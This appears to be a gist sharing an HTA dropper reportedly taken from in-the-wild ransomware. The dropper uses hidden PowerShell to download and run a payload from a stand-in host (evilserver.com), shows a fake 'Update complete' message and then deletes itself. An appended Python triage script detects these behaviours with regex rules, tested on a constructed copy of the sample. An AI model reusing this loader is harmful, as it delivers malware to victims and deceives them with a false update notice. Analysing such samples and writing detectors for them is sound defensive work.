@cmbaughman
Created June 13, 2019 00:01
Malware by HTA (MSHTML)
<HTML>
<HEAD>
<script>
try {
a=new ActiveXObject('Wscript.Shell');
a.Run("PowerShell -nop -noe $d=$env:temp+'\\4c2187acf5b34b9e97b6c675b7efba92.ps1';(New-Object System.Net.WebClient).DownloadFile('http://evilserver.com',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);",0,false);var b=new ActiveXObject('Scripting.FileSystemObject');var p = document.location.href;p = unescape(p.substr(8));if (b.FileExists(p))b.DeleteFile(p);
} catch (e) {}
close();
</script>
</HEAD>
<BODY>
</BODY>
</HTML>
@cmbaughman
Author

Fun sample from a ransomware currently in the wild. Replaced the ransomware server address with evilserver.com
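
A static triage check for the behaviours visible in the sample above, added here as an example and not part of the original gist: it pulls the script blocks out of an HTA file, matches them against heuristics for each step the sample performs, and returns any URLs defanged for reporting. The names `RULES`, `triage_hta`, `SAMPLE_HTA` and `BENIGN_HTA` are assumptions, and both fixtures are constructed (the URL uses the non-resolving `example.invalid`).

```python
import re

# Added heuristics: one regex per behaviour visible in the sample above.
RULES = {
    "wscript_shell": r"ActiveXObject\(\s*['\"]WScript\.Shell['\"]",
    "hidden_run": r"\.Run\(.*,\s*0\s*,\s*(?:false|true)\s*\)",  # window style 0
    "powershell_noprofile": r"powershell(?:\.exe)?\s+[^;]*-nop\b",
    "webclient_download": r"Net\.WebClient\)?\s*\.\s*Download(?:File|String)",
    "exec_from_temp": r"\$env:temp.*Start-Process",
    "self_delete": r"document\.location\.href.*DeleteFile\(",
    "swallowed_errors": r"catch\s*\(\s*\w+\s*\)\s*\{\s*\}",
}

# Constructed fixtures (not live samples); example.invalid never resolves.
SAMPLE_HTA = r"""<HTML><HEAD><script>
try {
a=new ActiveXObject('Wscript.Shell');
a.Run("PowerShell -nop -noe $d=$env:temp+'\\x.ps1';(New-Object System.Net.WebClient).DownloadFile('http://example.invalid/p',$d);Start-Process $d;",0,false);
var b=new ActiveXObject('Scripting.FileSystemObject');var p=document.location.href;
p=unescape(p.substr(8));if (b.FileExists(p))b.DeleteFile(p);
} catch (e) {}
close();
</script></HEAD></HTML>"""
BENIGN_HTA = "<html><head><script>document.title='Inventory';</script></head></html>"


def triage_hta(text):
    """Return matched rule names, defanged URLs and a dropper verdict."""
    flags = re.I | re.S
    scripts = re.findall(r"<script[^>]*>(.*?)</script>", text, flags)
    body = "\n".join(scripts)
    hits = sorted(name for name, rx in RULES.items() if re.search(rx, body, flags))
    # Defang URLs so they can be pasted into tickets without becoming clickable.
    urls = [u.replace("http", "hxxp", 1).replace(".", "[.]")
            for u in re.findall(r"https?://[^\s'\"\)]+", body)]
    # Shell access plus a network download is the minimum for a dropper verdict.
    dropper = {"wscript_shell", "webclient_download"} <= set(hits)
    return {"hits": hits, "urls": urls, "dropper": dropper}


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_HTA), ("benign", BENIGN_HTA)):
        print(label, triage_hta(doc))
```

The rules are string heuristics, so an obfuscated variant (split strings, encoded commands) will need additional patterns or script-block logging on the endpoint.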
